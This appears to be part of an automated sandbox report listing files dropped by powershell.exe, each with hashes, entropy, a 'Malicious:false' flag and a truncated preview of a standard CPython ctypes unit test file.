                                                                                                                                                                                                            Preview:r'''..This tests the '_objects' attribute of ctypes instances. '_objects'..holds references to objects that must be kept alive as long as the..ctypes instance, to make sure that the memory buffer is valid.....WARNING: The '_objects' attribute is exposed ONLY for debugging ctypes itself,..it MUST NEVER BE MODIFIED!....'_objects' is initialized to a dictionary on first use, before that it..is None.....Here is an array of string pointers:....>>> from ctypes import *..>>> array = (c_char_p * 5)()..>>> print(array._objects)..None..>>>....The memory block stores pointers to strings, and the strings itself..assigned from Python must be kept.....>>> array[4] = b'foo bar'..>>> array._objects..{'4': b'foo bar'}..>>> array[4]..b'foo bar'..>>>....It gets more complicated when the ctypes instance itself is contained..in a 'base' object.....>>> class X(Structure):..... _fields_ = [("x", c_int), ("y", c_int), ("array", c_char_p * 5)].......>>> x = X()..>>> print(x._objects)..None..>>>....The'arr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11392
                                                                                                                                                                                                            Entropy (8bit):4.811648075811102
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Fy7URIxmdCZ7rTXPTHlizTomGvNeXyj6D9BYC4ipA9BRC4ipUy:Y7URIEdCZP6AuBYC4ipiBRC4ipUy
                                                                                                                                                                                                            MD5:D037FA8B3539E4E47843E1C03CAC7021
                                                                                                                                                                                                            SHA1:FFC8B41AA0E3E8988CB5C619DF6EF29E607F1288
                                                                                                                                                                                                            SHA-256:C34F5991662A06E2DD6F861ADAD8520327B8F072151B78ADFB20ABAED97BD187
                                                                                                                                                                                                            SHA-512:C52A027CBE620FC87338686918FF38B7111866835502CD802F149380EA2E875AF8551BDA25DD0A1B69ADB32AA191D5651CBBD196F52A01B6CA3E2541F047E11F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:import unittest..from ctypes.test import need_symbol..import test.support....class SimpleTypesTestCase(unittest.TestCase):.... def setUp(self):.. import ctypes.. try:.. from _ctypes import set_conversion_mode.. except ImportError:.. pass.. else:.. self.prev_conv_mode = set_conversion_mode("ascii", "strict").... def tearDown(self):.. try:.. from _ctypes import set_conversion_mode.. except ImportError:.. pass.. else:.. set_conversion_mode(*self.prev_conv_mode).... def test_subclasses(self):.. from ctypes import c_void_p, c_char_p.. # ctypes 0.9.5 and before did overwrite from_param in SimpleType_new.. class CVOIDP(c_void_p):.. def from_param(cls, value):.. return value * 2.. from_param = classmethod(from_param).... class CCHARP(c_char_p):.. def from_param(cls, value):.. return
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8916
                                                                                                                                                                                                            Entropy (8bit):4.444463384107097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:FFpwv51CXTfwCk4JoeKJNJbx0OCdTcLS0yyRNWQAqEvdhHJJHJqfWA:rivuDfpNJCJNJbhuTcO0hGHJJHJqfWA
                                                                                                                                                                                                            MD5:17B5927F85AEC0C21EEA42E1E2700CCD
                                                                                                                                                                                                            SHA1:90462C1408A0907CF55C07F0998BC9384EBB663F
                                                                                                                                                                                                            SHA-256:48A7D17421C3872E4F178BDBFE1B162088E78E6F57AC6E2F2D74562C0DE72CBF
                                                                                                                                                                                                            SHA-512:DEAD65B746F2452B555E5AF5770623CF965DDA1EC4D3A4CDACC8F996B52A9740EE91DC7FB73B3686D6D8134E1ED08BCBE25F48AE7CBF088B554D735F635B6FB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from ctypes import *..import re, sys....if sys.byteorder == "little":.. THIS_ENDIAN = "<".. OTHER_ENDIAN = ">"..else:.. THIS_ENDIAN = ">".. OTHER_ENDIAN = "<"....def normalize(format):.. # Remove current endian specifier and white space from a format.. # string.. if format is None:.. return "".. format = format.replace(OTHER_ENDIAN, THIS_ENDIAN).. return re.sub(r"\s", "", format)....class Test(unittest.TestCase):.... def test_native_types(self):.. for tp, fmt, shape, itemtp in native_types:.. ob = tp().. v = memoryview(ob).. try:.. self.assertEqual(normalize(v.format), normalize(fmt)).. if shape:.. self.assertEqual(len(v), shape[0]).. else:.. self.assertEqual(len(v) * sizeof(itemtp), sizeof(ob)).. self.assertEqual(v.itemsize, sizeof(itemtp)).. self.assertEqual(v.shape, shape)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2299
                                                                                                                                                                                                            Entropy (8bit):4.504116097527198
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:NFZRTpZnRVtVUKBRuR1UxRpGGG6jJW29u5U5Mo9BmsA:NFZJfRVtCKXuRixRNjJdiU5MQjA
                                                                                                                                                                                                            MD5:30922E706085ED4839981E9E59DB7D72
                                                                                                                                                                                                            SHA1:CE527A71D17639E0FC6A680D18B043002B9B8201
                                                                                                                                                                                                            SHA-256:135583F9F11BA2B0FAE4BBE4D7A8A75544D36A9B88598BF46B110A949177CB81
                                                                                                                                                                                                            SHA-512:ECF573C8D8557CB0F286571C4E90EC91EADCF5E860261AE8597A9DE91EE9A310F4ADC2B180C9421B966D4CE4A47A54087DF0044DB00B15AF7594063A818E4476
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..import pickle..from ctypes import *..import _ctypes_test..dll = CDLL(_ctypes_test.__file__)....class X(Structure):.. _fields_ = [("a", c_int), ("b", c_double)].. init_called = 0.. def __init__(self, *args, **kw):.. X.init_called += 1.. self.x = 42....class Y(X):.. _fields_ = [("str", c_char_p)]....class PickleTest:.. def dumps(self, item):.. return pickle.dumps(item, self.proto).... def loads(self, item):.. return pickle.loads(item).... def test_simple(self):.. for src in [.. c_int(42),.. c_double(3.14),.. ]:.. dst = self.loads(self.dumps(src)).. self.assertEqual(src.__dict__, dst.__dict__).. self.assertEqual(memoryview(src).tobytes(),.. memoryview(dst).tobytes()).... def test_struct(self):.. X.init_called = 0.... x = X().. x.a = 42.. self.assertEqual(X.init_called, 1).... y = sel
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7462
                                                                                                                                                                                                            Entropy (8bit):4.679006448520697
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:zFe0tExZvqqI/NeAV5Y0BLbJHjpPvo76BUEnezkZSsUWOGAOQOe5OzZmImxPhpI4:rhgALY2BjFW6rezkZSsUBnPhky
                                                                                                                                                                                                            MD5:CC84C4A5707B83587F6B1244FC0B4734
                                                                                                                                                                                                            SHA1:BA333292FC959A22DD0EDD0F7129DADA68323A77
                                                                                                                                                                                                            SHA-256:BAEBC5584B93EA2DC1C31FF33A3A3D5504DDA33CE1503E8F41E99223CDE86688
                                                                                                                                                                                                            SHA-512:0367F847029130904F8C50AA333E3FE6B77D15F8867BCA48A231E94AC26451DBDF8BBF7A9B32F12D7ABE5DA6D05C3880AC87C1A0FBC310B10C24FBD56D0E5084
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest, sys....from ctypes import *..import _ctypes_test....ctype_types = [c_byte, c_ubyte, c_short, c_ushort, c_int, c_uint,.. c_long, c_ulong, c_longlong, c_ulonglong, c_double, c_float]..python_types = [int, int, int, int, int, int,.. int, int, int, int, float, float]....class PointersTestCase(unittest.TestCase):.... def test_pointer_crash(self):.... class A(POINTER(c_ulong)):.. pass.... POINTER(c_ulong)(c_ulong(22)).. # Pointer can't set contents: has no _type_.. self.assertRaises(TypeError, A, c_ulong(33)).... def test_pass_pointers(self):.. dll = CDLL(_ctypes_test.__file__).. func = dll._testfunc_p_p.. if sizeof(c_longlong) == sizeof(c_void_p):.. func.restype = c_longlong.. else:.. func.restype = c_long.... i = c_int(12345678)..## func.argtypes = (POINTER(c_int),).. address = func(byref(i)).. self.assertEqual(c_int.from
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7067
                                                                                                                                                                                                            Entropy (8bit):4.786855217642439
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:zJWYVa44Tl5Kd4aSbQrNIXbTIGQwlZ5gfb68DcqxWjZBU/sonIbBAIbbXvUFIbnL:zvaPl0d4bUxIrTowlsD6u4F+BfY2y
                                                                                                                                                                                                            MD5:95B3D8D27990B70FC6F7C653063093A9
                                                                                                                                                                                                            SHA1:9E0E526C3A8B21E094E8D88CBEE69917543C6C72
                                                                                                                                                                                                            SHA-256:A2CF32DE21C1D96703B5FA105B24D7C048BC8CD7AADCF79543FB7F207D81F261
                                                                                                                                                                                                            SHA-512:3F080496EC015651964881FED1D157F2A821505F9E4185E7EB16B4E2F44936FB121CC7F2D5D44136269182EBE81C49340F49F27FDC0BBA0C16E7BD02A9CDE13D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from ctypes import *..from ctypes.test import need_symbol..import unittest....# IMPORTANT INFO:..#..# Consider this call:..# func.restype = c_char_p..# func(c_char_p("123"))..# It returns..# "123"..#..# WHY IS THIS SO?..#..# argument tuple (c_char_p("123"), ) is destroyed after the function..# func is called, but NOT before the result is actually built...#..# If the arglist would be destroyed BEFORE the result has been built,..# the c_char_p("123") object would already have a zero refcount,..# and the pointer passed to (and returned by) the function would..# probably point to deallocated space...#..# In this case, there would have to be an additional reference to the argument.......import _ctypes_test..testdll = CDLL(_ctypes_test.__file__)....# Return machine address `a` as a (possibly long) non-negative integer...# Starting with Python 2.5, id(anything) is always non-negative, and..# the ctypes addressof() inherits that via PyLong_FromVoidPtr()...def positive_address(a):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2853
                                                                                                                                                                                                            Entropy (8bit):4.896879091218641
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1QkE6mqZbhyId3RFRER7RWRkRa7ts//gWrxXzEX3uXEXZXDym/8TN2a4vgC5R66o:DoqZFVT7BcFmT/852aOBRTHA
                                                                                                                                                                                                            MD5:7966F0EE6DDEACCD9BA7D19D475BF5D0
                                                                                                                                                                                                            SHA1:DE9F9C62A81F20C448822310E17035534438DA6B
                                                                                                                                                                                                            SHA-256:692EB16CED703D76A2E665FAB7A13D4C6B6D96770D1189FB6BE431AC191867CD
                                                                                                                                                                                                            SHA-512:C371E0CAE0E572A5164E08C77B16681B4AA7F29FFD972DA21A519B21902AC924DD0C629331BC764006E320682F47C99AF5D1BE67AD8A83DAD28A63AF4720CF51
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from ctypes import *..import unittest..from test import support....################################################################..# This section should be moved into ctypes\__init__.py, when it's ready.....from _ctypes import PyObj_FromPtr....################################################################....from sys import getrefcount as grc....class PythonAPITestCase(unittest.TestCase):.... def test_PyBytes_FromStringAndSize(self):.. PyBytes_FromStringAndSize = pythonapi.PyBytes_FromStringAndSize.... PyBytes_FromStringAndSize.restype = py_object.. PyBytes_FromStringAndSize.argtypes = c_char_p, c_size_t.... self.assertEqual(PyBytes_FromStringAndSize(b"abcdefghi", 3), b"abc").... @support.refcount_test.. def test_PyString_FromString(self):.. pythonapi.PyBytes_FromString.restype = py_object.. pythonapi.PyBytes_FromString.argtypes = (c_char_p,).... s = b"abc".. refcnt = grc(s).. pyob = pythonapi.PyBytes_FromStrin
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2913
                                                                                                                                                                                                            Entropy (8bit):4.737478028898721
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:HNYaoR/Xm0oSngccRN6c6JwIge5L4Djhl1x9AoEFKZHRjx+kWa1:HNYjRPm0X1ge14Djhl1jApYZxjx+kWy
                                                                                                                                                                                                            MD5:B449761697D1195F8B4DA5AC5F8ADC9E
                                                                                                                                                                                                            SHA1:6C12A2A018D84D4C725FDA6A4A6683B71B7E3E0D
                                                                                                                                                                                                            SHA-256:5E99F35D8AC97F7E2118DD5A41867C8EB5815344E6AC4249D098F12736FC8D34
                                                                                                                                                                                                            SHA-512:77FA0413A97D0B86FEC9CA554B547815A38C95643E6B1E76048F7600DB2D3B6B032DD565FBB0DB74421F2B719C86A34E390909DEB2CB9E3C992E2E0E6B3D9745
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from ctypes import *..import contextlib..from test import support..import unittest..import sys......def callback_func(arg):.. 42 / arg.. raise ValueError(arg)....@unittest.skipUnless(sys.platform == "win32", 'Windows-specific test')..class call_function_TestCase(unittest.TestCase):.. # _ctypes.call_function is deprecated and private, but used by.. # Gary Bishp's readline module. If we have it, we must test it as well..... def test(self):.. from _ctypes import call_function.. windll.kernel32.LoadLibraryA.restype = c_void_p.. windll.kernel32.GetProcAddress.argtypes = c_void_p, c_char_p.. windll.kernel32.GetProcAddress.restype = c_void_p.... hdll = windll.kernel32.LoadLibraryA(b"kernel32").. funcaddr = windll.kernel32.GetProcAddress(hdll, b"GetModuleHandleA").... self.assertEqual(call_function(funcaddr, (None,)),.. windll.kernel32.GetModuleHandleA(None))....class CallbackTracbackTestCase(unittest.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3254
                                                                                                                                                                                                            Entropy (8bit):4.52343175691956
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:F3jmqNrMKPpEUAtxGiikJmVGiae7FGiaQMXriLtPdhWs4Ya1:F3jmHoElJI7bM7iLOYy
                                                                                                                                                                                                            MD5:0144C4B8C2EA873D9BBF121A984EFB4F
                                                                                                                                                                                                            SHA1:BF71C2E74D8112BA8441B1138F8BE4F1176440A2
                                                                                                                                                                                                            SHA-256:0F080474BA755B48DFCF403849ED4C8C9C31DCBE69CFAF579EFD1991165CA9A7
                                                                                                                                                                                                            SHA-512:E1DA655734F042D948E7834599158093B6700C8D5B68402A60597BB19369DDE36EC06B8764FC2EB1563965B6D620094034AC57B0EFD3D2B771A55A8FC397B0D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from test import support..import ctypes..import gc....MyCallback = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)..OtherCallback = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_ulonglong)....import _ctypes_test..dll = ctypes.CDLL(_ctypes_test.__file__)....class RefcountTestCase(unittest.TestCase):.... @support.refcount_test.. def test_1(self):.. from sys import getrefcount as grc.... f = dll._testfunc_callback_i_if.. f.restype = ctypes.c_int.. f.argtypes = [ctypes.c_int, MyCallback].... def callback(value):.. #print "called back with", value.. return value.... self.assertEqual(grc(callback), 2).. cb = MyCallback(callback).... self.assertGreater(grc(callback), 2).. result = f(-10, cb).. self.assertEqual(result, -18).. cb = None.... gc.collect().... self.assertEqual(grc(callback), 2)...... @support.refcount_test.. def test_refcount(self):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):871
                                                                                                                                                                                                            Entropy (8bit):4.696633031986632
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1ANYXPHSMnCSADdgREJhe39j5r37WjLk/hiCpvbCS8KnfBCSMrS2pWB:1QYXPHnZEv4h5rQY/N1Fanpe
                                                                                                                                                                                                            MD5:DC164C6303D18BFBA316E23A8CC28A6E
                                                                                                                                                                                                            SHA1:07F443205240365AF25239CD8BF449C623E14BF5
                                                                                                                                                                                                            SHA-256:DB22BA49F0A2F142E60C675D3168CEEA667D9C15BE8DBA5D4156F5A4FDAFC16E
                                                                                                                                                                                                            SHA-512:30452D9612A2D63F545CB4F6E9DF3B3203500C0F236184D1A5085B1933D66AF0A13CC002ADAF121E79C8B9DF11B77DBE578F06D4F9A43497D21DA4443C802DB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from ctypes import *..import unittest....subclasses = []..for base in [c_byte, c_short, c_int, c_long, c_longlong,.. c_ubyte, c_ushort, c_uint, c_ulong, c_ulonglong,.. c_float, c_double, c_longdouble, c_bool]:.. class X(base):.. pass.. subclasses.append(X)....class X(c_char):.. pass....# This test checks if the __repr__ is correct for subclasses of simple types....class ReprTest(unittest.TestCase):.. def test_numbers(self):.. for typ in subclasses:.. base = typ.__bases__[0].. self.assertTrue(repr(base(42)).startswith(base.__name__)).. self.assertEqual("<X object at", repr(typ(42))[:12]).... def test_char(self):.. self.assertEqual("c_char(b'x')", repr(c_char(b'x'))).. self.assertEqual("<X object at", repr(X(b'x'))[:12])....if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2959
                                                                                                                                                                                                            Entropy (8bit):4.657179289164599
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:FsT5snBbHPe8RDOL0/08ywbc3GtpQdRVl708zGvfpQMRk70Nzl8HpGvfpQMR/K7t:FsG1eV1WpItSpF6IptA
                                                                                                                                                                                                            MD5:DAAE61C1208D19F3EEAF67E808574EFC
                                                                                                                                                                                                            SHA1:B7DF7A61B9DCA5ED956CC101C17BDF25555A119D
                                                                                                                                                                                                            SHA-256:3E54A503AEAACADF9F1D88C8079B17B90FDC304FD0BE1A88945DBAFD4F61454F
                                                                                                                                                                                                            SHA-512:3759E7D62D3819D1E9D79A47E6C127CE0A0AD86C7590D2E30F5726401F3DF1C403FB8BC0B219BDF332DE5BA95E0F70F57B743562FD7EF63832AC5F2E615BA53B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from ctypes import *....import _ctypes_test....class ReturnFuncPtrTestCase(unittest.TestCase):.... def test_with_prototype(self):.. # The _ctypes_test shared lib/dll exports quite some functions for testing... # The get_strchr function returns a *pointer* to the C strchr function... dll = CDLL(_ctypes_test.__file__).. get_strchr = dll.get_strchr.. get_strchr.restype = CFUNCTYPE(c_char_p, c_char_p, c_char).. strchr = get_strchr().. self.assertEqual(strchr(b"abcdef", b"b"), b"bcdef").. self.assertEqual(strchr(b"abcdef", b"x"), None).. self.assertEqual(strchr(b"abcdef", 98), b"bcdef").. self.assertEqual(strchr(b"abcdef", 107), None).. self.assertRaises(ArgumentError, strchr, b"abcdef", 3.0).. self.assertRaises(TypeError, strchr, b"abcdef").... def test_without_prototype(self):.. dll = CDLL(_ctypes_test.__file__).. get_strchr = dll.get_strchr.. # the default 'c_in
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1344
                                                                                                                                                                                                            Entropy (8bit):4.601563850662182
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:FQjmJAPHwlOjbx0/CzmHmIAwu6oCOe46DZbTimape:FQjmJvOj2RmOu6oCOSnEA
                                                                                                                                                                                                            MD5:FB3737B32013A3EA2C0EF4821BE927C0
                                                                                                                                                                                                            SHA1:F9C772B0301B2773A0F1AF902DCFA6BAACEC8F72
                                                                                                                                                                                                            SHA-256:C88982C642D80F89DAE724EE33E651CD699BC55BEFE2125D00BA46E05FEB3A32
                                                                                                                                                                                                            SHA-512:B8B76513E96E02A37FB56D2CCA2FA58BE3B32CBF8E8D953A153846C4AF4B20A7BF3C1E0600B16A5FA1F21BC845B5AB4D962780E1F102FB90645D62ECAF940D62
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from ctypes import *....class MyInt(c_int):.. def __eq__(self, other):.. if type(other) != MyInt:.. return NotImplementedError.. return self.value == other.value....class Test(unittest.TestCase):.... def test_compare(self):.. self.assertEqual(MyInt(3), MyInt(3)).. self.assertNotEqual(MyInt(42), MyInt(43)).... def test_ignore_retval(self):.. # Test if the return value of a callback is ignored.. # if restype is None.. proto = CFUNCTYPE(None).. def func():.. return (1, "abc", None).... cb = proto(func).. self.assertEqual(None, cb())...... def test_int_callback(self):.. args = [].. def func(arg):.. args.append(arg).. return arg.... cb = CFUNCTYPE(None, MyInt)(func).... self.assertEqual(None, cb(42)).. self.assertEqual(type(args[-1]), MyInt).... cb = CFUNCTYPE(c_int, c_int)(func).... self.assertEqual(4
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):837
                                                                                                                                                                                                            Entropy (8bit):4.57222881002833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:PN/oztMSAmKu+Sm53WABbqGRHVlFl643RM6HAM+02pWB:Pto1f8KK3RHVQ43RxHAMcpe
                                                                                                                                                                                                            MD5:585936C02BCA218C821CB09A0E6907F7
                                                                                                                                                                                                            SHA1:99138D96F09266295DC33DF92EC63F67415D1D99
                                                                                                                                                                                                            SHA-256:B88CF2EF8990F6F4C8B97B205210512502BB97CCCDFDB35752536B891DC7C378
                                                                                                                                                                                                            SHA-512:4D2A48935BF9E70FA789A9E521B50BA252DBEC8929CF49C55672C154BADD9911D2738CB0DDB0D66F034B3D040FBC74522459E707DDC2E0FBB103260DD8EEFED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Test specifically-sized containers.....from ctypes import *....import unittest......class SizesTestCase(unittest.TestCase):.. def test_8(self):.. self.assertEqual(1, sizeof(c_int8)).. self.assertEqual(1, sizeof(c_uint8)).... def test_16(self):.. self.assertEqual(2, sizeof(c_int16)).. self.assertEqual(2, sizeof(c_uint16)).... def test_32(self):.. self.assertEqual(4, sizeof(c_int32)).. self.assertEqual(4, sizeof(c_uint32)).... def test_64(self):.. self.assertEqual(8, sizeof(c_int64)).. self.assertEqual(8, sizeof(c_uint64)).... def test_size_t(self):.. self.assertEqual(sizeof(c_void_p), sizeof(c_size_t)).... def test_ssize_t(self):.. self.assertEqual(sizeof(c_void_p), sizeof(c_ssize_t))......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6192
                                                                                                                                                                                                            Entropy (8bit):4.745104588555518
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:FxtahsGmuSzy1eY0apAp6WT7o3thYnbNo0HGQopp6WG5Kuxxu6A:YhsGmuSzy1eSwn9dlA
                                                                                                                                                                                                            MD5:000A4990ABCA74AE3F65106C847D3E7C
                                                                                                                                                                                                            SHA1:B753556E66E068F980A9931C46CFCF12D46994DA
                                                                                                                                                                                                            SHA-256:6AA1B72EB150B272DE1884D2261DDF28A73DF82B142BAC3E8425FCD496F6D31B
                                                                                                                                                                                                            SHA-512:785AEF7D2E3C4249360BA53FC9A8D0B03DC2680C62E4023C84A0A4D570919CF96F782CD6F53B7E1BC8AB195BB714ECF64004A40ECF8B0F5798544157EBE1050C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from ctypes import *..from ctypes.test import need_symbol....import _ctypes_test....class SlicesTestCase(unittest.TestCase):.. def test_getslice_cint(self):.. a = (c_int * 100)(*range(1100, 1200)).. b = list(range(1100, 1200)).. self.assertEqual(a[0:2], b[0:2]).. self.assertEqual(a[0:2:], b[0:2:]).. self.assertEqual(len(a), len(b)).. self.assertEqual(a[5:7], b[5:7]).. self.assertEqual(a[5:7:], b[5:7:]).. self.assertEqual(a[-1], b[-1]).. self.assertEqual(a[:], b[:]).. self.assertEqual(a[::], b[::]).. self.assertEqual(a[10::-1], b[10::-1]).. self.assertEqual(a[30:20:-1], b[30:20:-1]).. self.assertEqual(a[:12:6], b[:12:6]).. self.assertEqual(a[2:6:4], b[2:6:4]).... a[0:5] = range(5, 10).. self.assertEqual(a[0:5], list(range(5, 10))).. self.assertEqual(a[0:5:], list(range(5, 10))).. self.assertEqual(a[4::-1], list(range(9, 4, -1))).... def tes
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2675
                                                                                                                                                                                                            Entropy (8bit):4.652599692669734
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:FWsV6pDy6uHBvbY5y5eRJbOPy1S9bP1NrPy1SGIZy5e3acFG/ZuN9FVtIZdcPa1:FWsV6Lu25yOJGymvygywthy
                                                                                                                                                                                                            MD5:3DBE3E2B362D6DA28819A8BB20838B4C
                                                                                                                                                                                                            SHA1:EA963D5FE7DB8E39A4908DC5F8F623A3C3248EB7
                                                                                                                                                                                                            SHA-256:09C49540BD86CCC2F714C8188A85F9A419B854AFE504E1D0B5450ADB71AAFDD3
                                                                                                                                                                                                            SHA-512:391CC6C51466AAF8A0D43E14C112C701ACC361DCEF572B7F94B5B9904381A16E51AE78214DEA391830FADF5CD52E28CEBA45C6B00090BAB71EFD3C6ADC5AC482
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
